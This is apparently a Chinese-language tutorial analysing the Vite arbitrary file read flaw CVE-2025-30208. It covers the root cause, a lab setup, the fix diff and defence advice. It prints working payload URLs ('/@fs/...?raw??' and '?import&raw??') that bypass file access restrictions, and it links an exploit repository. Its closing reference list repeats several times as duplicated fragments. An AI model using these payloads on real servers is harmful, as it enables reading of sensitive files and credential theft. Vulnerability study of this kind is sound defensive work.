Vite 任意文件读取漏洞(CVE-2025-30208) 深度分析与教学文档<\/h1>

漏洞概述<\/h2>

Vite 是一个现代前端构建工具，为Web项目提供快速、精简的开发体验。该工具主要由两部分组成：<\/p>

具有热模块替换(HMR)功能的开发服务器<\/li>

使用Rollup打包代码的构建命令<\/li> <\/ol>

在Vite 6.2.3、6.1.2、6.0.12、5.4.15和4.5.10之前的版本中，存在一个严重的安全漏洞，允许攻击者绕过server.fs.deny<\/code>限制，读取文件系统上的任意文件。<\/p>

漏洞编号<\/h2>

CVE编号: CVE-2025-30208<\/li>
GitHub Advisory: GHSA-x574-m823-4x7w<\/li>
<\/ul>
影响版本<\/h2>

Vite < 6.2.3<\/li>
Vite < 6.1.2<\/li>
Vite < 6.0.12<\/li>
Vite < 5.4.15<\/li>
Vite < 4.5.10<\/li>
<\/ul>
漏洞原理<\/h2>
正常访问控制机制<\/h3>
Vite使用server.fs.allow<\/code>机制控制允许访问的目录范围，主要涉及三个关键函数：<\/p>

isFileServingAllowed<\/code>: 判断URL是否允许被Vite服务器访问<\/li>
isFileLoadingAllowed<\/code>: 检查文件路径是否符合Vite的文件访问规则<\/li>
ensureServingAccess<\/code>: 处理HTTP请求，如果文件不被允许访问则返回403<\/li>
<\/ol>
漏洞利用方式<\/h3>
攻击者可以通过在URL的@fs<\/code>前缀后增加?raw??<\/code>或?import&raw??<\/code>参数，绕过文件访问限制。例如：<\/p>
\/@fs\/path\/to\/sensitive\/file?raw??
或
\/@fs\/path\/to\/sensitive\/file?import&raw??
<\/code><\/pre>
技术细节<\/h3>


正则匹配绕过<\/strong>:<\/p>

漏洞版本的正则匹配模式位于packages\/vite\/src\/node\/utils.ts<\/code><\/li>
通过添加?raw??<\/code>或?import&raw??<\/code>参数，攻击者首先成功通过正则匹配<\/li>
当URL被输入ensureServingAccess<\/code>时，系统会判定这不是系统文件，从而绕过两个安全检查<\/li>
<\/ul>
<\/li>

修复方案<\/strong>:<\/p>

在正则匹配之前使用urlWithoutTrailingQuerySeparators<\/code>方法处理URL<\/li>
权限检测现在基于urlWithoutTrailingQuerySeparators<\/code>处理后的文件路径<\/li>
新增了对trailingQuerySeparatorsRE<\/code>的处理<\/li>
<\/ul>
<\/li>
<\/ol>
环境搭建<\/h2>


安装受影响版本的Vite:<\/p>
npm install vite@6.2.2  # 明确指定漏洞版本<\/span>
<\/span><\/span><\/code><\/pre><\/li>

创建测试项目结构:<\/p>
project\/
├── src\/
│   └── main.js
├── vite.config.js
└── sensitive.txt
<\/code><\/pre>
<\/li>

配置vite.config.js<\/code>:<\/p>
export<\/span> default<\/span> {
<\/span><\/span>  server<\/span>:<\/span> {
<\/span><\/span>    fs<\/span>:<\/span> {
<\/span><\/span>      allow<\/span>:<\/span> ['.'<\/span>],  \/\/ 仅允许访问项目根目录
<\/span><\/span><\/span><\/span>      deny<\/span>:<\/span> ['..\/'<\/span>]  \/\/ 禁止访问上级目录
<\/span><\/span><\/span><\/span>    }
<\/span><\/span>  }
<\/span><\/span>}
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
漏洞复现步骤<\/h2>


启动Vite开发服务器:<\/p>
npx vite
<\/span><\/span><\/code><\/pre><\/li>

尝试正常访问受限文件(应失败):<\/p>
http:\/\/localhost:5173\/@fs\/path\/to\/sensitive\/file
<\/code><\/pre>
<\/li>

使用漏洞payload访问(成功读取):<\/p>
http:\/\/localhost:5173\/@fs\/path\/to\/sensitive\/file?raw??
或
http:\/\/localhost:5173\/@fs\/path\/to\/sensitive\/file?import&raw??
<\/code><\/pre>
<\/li>
<\/ol>
漏洞修复方案<\/h2>


升级到安全版本:<\/p>
npm install vite@latest
<\/span><\/span><\/code><\/pre><\/li>

关键修复点:<\/p>

引入urlWithoutTrailingQuerySeparators<\/code>方法处理URL<\/li>
修改正则匹配逻辑，正确处理查询参数<\/li>
权限检测基于处理后的URL路径<\/li>
<\/ul>
<\/li>

修复代码diff:<\/p>
+ const urlWithoutTrailingQuerySeparators = (url: string) => {
<\/span><\/span><\/span>+   return url.replace(trailingQuerySeparatorsRE, '')
<\/span><\/span><\/span>+ }
<\/span><\/span><\/span><\/span>
<\/span><\/span>- const isFileServingAllowed = (url: string) => {
<\/span><\/span><\/span><\/span>+ const isFileServingAllowed = (rawUrl: string) => {
<\/span><\/span><\/span>+   const url = urlWithoutTrailingQuerySeparators(rawUrl)
<\/span><\/span><\/span><\/code><\/pre><\/li>
<\/ol>
防御建议<\/h2>

立即升级Vite到最新安全版本<\/li>
在生产环境中限制Vite开发服务器的访问<\/li>
使用防火墙规则限制开发服务器的网络暴露<\/li>
定期审查项目依赖的安全公告<\/li>
<\/ol>
参考资源<\/h2>

官方修复commit: vitejs\/vite@f234b574<\/a><\/li>
GitHub Advisory: GHSA-x574-m823-4x7w<\/a><\/li>
EXP利用代码: ThumpBo\/CVE-2025-30208-EXP<\/a><\/li>
<\/ol>

Vite 任意文件读取漏洞(CVE-2025-30208) 深度分析与教学文档<\/h1>

漏洞原理<\/h2>

参考资源<\/h2> 官方修复commit: vitejs\/vite@f234b574<\/a><\/li> GitHub Advisory: GHSA-x574-m823-4x7w<\/a><\/li> EXP利用代码: ThumpBo\/CVE-2025-30208-EXP<\/a><\/li> <\/ol>

参考资源<\/h2>

官方修复commit: vitejs\/vite@f234b574<\/a><\/li>
GitHub Advisory: GHSA-x574-m823-4x7w<\/a><\/li>
EXP利用代码: ThumpBo\/CVE-2025-30208-EXP<\/a><\/li> <\/ol>